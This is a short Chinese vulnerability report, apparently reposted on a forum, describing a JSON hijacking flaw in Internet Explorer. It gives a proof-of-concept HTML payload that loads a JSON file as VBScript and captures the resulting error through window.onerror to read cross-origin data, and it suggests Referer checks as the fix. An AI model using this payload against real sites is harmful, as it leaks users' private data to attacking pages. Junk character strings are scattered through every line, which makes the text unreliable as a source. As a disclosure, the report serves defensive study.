简要描述:
5 m6 m9 D2 n& o8 W( h2 Y% y
$ w9 A( G2 E6 e% y( j9 h! |由于某些资源容器对数据处理不当导致json劫持漏洞.. Y- K7 X: B% M( n$ n
详细说明:
! h' s( _; B+ p) h, i* U由于ie支持vbscript,所以script元素可以指定成vbscript语言:
3 u& @. \0 f/ ]' M6 W<script language=vbscript></script>
0 ~$ @2 r7 O1 N* Q6 M
# f, k8 A1 D0 k% e0 O, _当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.' [/ t; l% n' {; I9 X& J- V
漏洞证明:
8 O- U, I6 |" C! t<script> c6 z5 N& @) d3 s$ H7 C
window.onerror=function(_){
! K" g. M3 E6 J" Ualert(_)
" Y ?& C6 V" _6 y9 g}1 `& ^4 o5 v3 x: [ K9 l$ x1 \9 k; W
</script>
( T9 X z, @% G+ {% s# b/ B<script language=vbscript src=1.json></script>4 m; B7 o2 Z7 F! X3 N
, h+ l" ]- z& F 2 B% _& Q6 U Q; S: g7 X0 |
1.json:
6 H7 d) c) g+ M' U' }[{"name":"sogili","age":19}]
" [- I' q- H3 g4 k: y Y. w; N# ^修复方案:
6 t- \( N! O B网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对